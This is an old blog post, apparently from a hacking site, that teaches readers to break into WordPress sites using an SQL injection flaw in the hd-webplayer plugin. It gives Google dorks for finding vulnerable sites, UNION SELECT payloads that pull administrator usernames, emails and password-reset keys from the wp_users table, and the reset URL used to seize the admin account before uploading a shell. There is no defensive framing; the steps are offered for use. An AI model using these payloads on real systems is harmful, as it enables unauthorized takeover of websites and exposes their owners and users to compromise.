Thursday 21 November 2013

HOW TO HACK WORDPRESS WEBSITE WITH SQLI VUL.+ SHELL UPLOADING

SOCIALIZE IT →

First of all we need to find a vulnerable page.
We enter this in Google:
Code:
# Dork 1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="

# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="

# Dork 3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"

When you found your site you need to find admin email and username.
I will be using this site for example:
Code:
http://www.website.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=3


When i add ' text disappears so it is vulnerable.

NOTE: I will not demonstrate how to SQL inject.

Now we need admin username and email.
We need to inject:
Code:
http://www. website .com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--

Now we have 2 users.

We pick one and copy his email.
Go to the login page of the site.
It is usually here:
Code:
http://www.site.com/wp-login.php

And press "Lost your password?"

Now you enter either username or email.
We can enter both so it doesn't matter.
I entered email.


Now when you got:

"Check your e-mail for the confirmation link."

It means that reset key is successfully sent.
Now we need to get the activation key.

Go back to the syntax you used for extracting email and username and do this:
Code:
http://www. website .com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--


Code:
http://www. website .com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users--

Voila!
Now we just need to reset it.

Go to:
Code:
wp-login.php?action=rp&key=resetkey&login=username

NOTE: Replace key= & login=

So my link will be:

Enter new password:

Login with new password and shell it.
SOURCE : HAXSEEKER 

0 comments:

Post a Comment